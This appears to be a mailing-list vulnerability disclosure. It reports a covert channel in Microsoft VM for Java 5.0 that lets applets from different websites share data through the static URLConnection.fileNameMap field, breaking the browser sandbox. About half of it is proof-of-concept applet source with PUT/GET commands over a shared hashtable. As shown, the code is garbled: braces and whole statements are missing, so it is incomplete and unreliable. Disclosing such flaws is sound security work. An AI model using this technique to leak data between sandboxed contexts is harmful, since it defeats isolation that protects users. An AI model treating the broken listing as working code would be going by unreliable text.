Covert Channel in MSJVM , 5.0 Release

Hi y'all,
I have not found the contact address for microsoft jvm
security issues, therefore maybe someone who reads
bugtraq can forward this:
in the Microsoft (R) VM for Java, 5.0 Release
the implementation  of some core system classes allows to
create covert channels between applets that are
loaded from different websites (aka cross-site java).
These applet share a common class loader for
the system classes all public static (non-final)
fields can be used to create a covert channel in accordance
to the sandbox restriction and exchange cross-site
information. This may be used for security zone violation
and general data leakage.

When you load the two applets into two windows of the same IE(if you use Ctrl+N):




you can use the commands

PUT/Key/Value  to create an entry in the shared hashtable of the applets
GET/Key to read an entry in the shared hashtable of the applets

'Key' and 'Value' are string values. 

So if you PUT/TopScorer/Makaay in the lower textbox and press "Perform
Action" and then switch to applet B which has an identical look and enter
'GET/TopScorer' and "Perform Action" you will be prompted with 'Makaay',
which is an information that should only be known to applet A.
For a demonstration try yourself or look at the first screenshot below [pic1]. 

I think this is a major violation of sandbox constraints.
Prerequisite is when both applets are started by the same IE process (use Ctrl+N), 
as the JVM and its memory are shared. Having two IE processes means two JVMs and of 
course no covert channel and you get an error like in the second screenshot [pic2]. 

Marc Schoenefeld 

P.S: Read some more java stuff at

P.P.S: Thanks to Siva Subbu for the remarks concerning the error messages 

pic1, how it should look

pic2, oops, you did not use Ctrl+N

import java.awt.datatransfer.DataFlavor; 
import java.util.*; 
import java.awt.*; 
import java.awt.event.*; 

public class CovAppletFNMap  extends java.applet.Applet {
 TextArea ta ;
   TextField tf;
   Button bu; 
Label la1;
Label la2;

   class MyButtonListener implements ActionListener {
       public void actionPerformed(ActionEvent event) {
           String b = URLConnection.fileNameMap.getContentTypeFor(tf.getText());
    public CovAppletFNMap () {
       la1= new Label("PUT/Key/Value to put in shared Hashtable");
       la2= new Label("GET/Key to get from shread Hashtable");
       tf = new TextField("", 40);
       ta = new TextArea ("",5, 40, TextArea.SCROLLBARS_NONE);
       bu = new Button("Perform action"); 
     bu.addActionListener(new MyButtonListener ());                      
    public void start() {
        if (URLConnection.fileNameMap == null) 
           URLConnection.fileNameMap = new FNMAP(); 
     String i = URLConnection.fileNameMap.getContentTypeFor("GET/Bayern"); 

    public static void main(String[] a) {
     new CovAppletFNMap().start(); 
     String i = URLConnection.fileNameMap.getContentTypeFor("GET/Bayern"); 

import java.util.*; 
public class FNMAP implements FileNameMap {
  public FNMAP() {
  Hashtable ht = new Hashtable(); 
  public String getContentTypeFor(String s) {
     int i = 0 ; 
     StringTokenizer t = new StringTokenizer(s,"/"); 
     String action = ""; 
     String key = ""; 
     String value = ""; 
     while (t.hasMoreTokens()) {
        String tok = t.nextToken(); 
//         System.out.println(tok); 
        if (i==0) { action = tok; } 
        if (i==1) { key = tok; } 
        if (i==2) { value = tok; } 
//     System.out.println("action"+action+"key"+key+"value"+value); 
     if (action.equals("GET")) { return ht.get(key).toString(); }
     if (action.equals("PUT")) { ht.put(key,value); return key;  }
     return "";